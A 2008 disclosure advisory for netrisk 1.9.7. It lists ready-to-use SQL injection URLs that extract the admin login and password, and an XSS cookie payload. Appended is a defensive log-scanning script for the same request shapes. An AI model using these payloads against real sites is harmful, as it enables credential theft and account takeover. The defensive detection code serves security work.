Computer Security
[EN] securityvulns.ru




From:hadihadi_zedehal_2006_(at)_yahoo.com <hadihadi_zedehal_2006_(at)_yahoo.com>
Date:08.01.2008
Subject:netrisk 1.9.7 Multiple Remote Vulnerabilities (sql injection/xss)

          
  ####################################################################
  #                                                                  #
  #  ...:::::netrisk 1.9.7 Multiple Remote Vulnerabilities::::....  #
  #                        (sql injection/xss)                       #           
  ####################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discovered By : virangar security team
(hadihadi)
---------------------------------
special tnx to:MR.nosrati,black.shadowes,MR.hesy,satan,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
------------------------------------

vulns:

1.sql injection:
get admin login name:
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,2,login,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*
---
get admin pass:
http://site.com/patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,2,pass,4,5,6,7,8,9,10,11/**/from/**/users/**/where/**/id=1/*
########################
2.xss:
http://site.com/patch/index.php?page=<script>alert(document.cookie)</script>

########################
NetRisk contains other SQL injection/XSS/LFI bugs in other pages ;)
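
A defensive check for the request shapes in this advisory, as an added example that is not part of the original post or of NetRisk's code: it scans web access-log lines for `pid` values that are not plain integers and `page` values that are not plain slugs. The log lines are constructed, and the integer and slug formats are assumptions about what legitimate requests to `index.php` look like.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from a real server).
SAMPLE_LOG = """\
198.51.100.7 - - [08/Jan/2008:10:01:02 +0000] "GET /patch/index.php?page=profile&pid=12 HTTP/1.1" 200 5120
198.51.100.9 - - [08/Jan/2008:10:02:10 +0000] "GET /patch/index.php?page=profile&pid=-1/**/union/**/select/**/1,2,login,4/**/from/**/users/* HTTP/1.1" 200 4890
198.51.100.9 - - [08/Jan/2008:10:03:44 +0000] "GET /patch/index.php?page=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 2311
198.51.100.7 - - [08/Jan/2008:10:04:00 +0000] "GET /patch/index.php?page=news HTTP/1.1" 200 3300
"""

# Client address and request target from a common/combined log format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PID_OK = re.compile(r"\d{1,10}")               # assumption: pid is a numeric id
PAGE_OK = re.compile(r"[A-Za-z0-9_-]{1,32}")   # assumption: page is a short slug


def check_request(target):
    """Return the reasons a request target breaks the expected parameter shapes."""
    # parse_qs URL-decodes values, so encoded markup is judged in decoded form.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    reasons = []
    for value in query.get("pid", []):
        if not PID_OK.fullmatch(value):
            reasons.append("pid is not a plain integer")
    for value in query.get("page", []):
        if not PAGE_OK.fullmatch(value):
            reasons.append("page is not a plain slug")
    return reasons


def scan(log_text):
    """Return (line number, client address, reasons) for each suspicious line."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a parsable request line
        reasons = check_request(match.group(2))
        if reasons:
            findings.append((lineno, match.group(1), reasons))
    return findings


if __name__ == "__main__":
    for lineno, client, reasons in scan(SAMPLE_LOG):
        print(f"line {lineno} from {client}: {'; '.join(reasons)}")
```

The same two shape checks, applied server-side before `pid` reaches a query or `page` reaches the response, reject these requests outright instead of only logging them.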
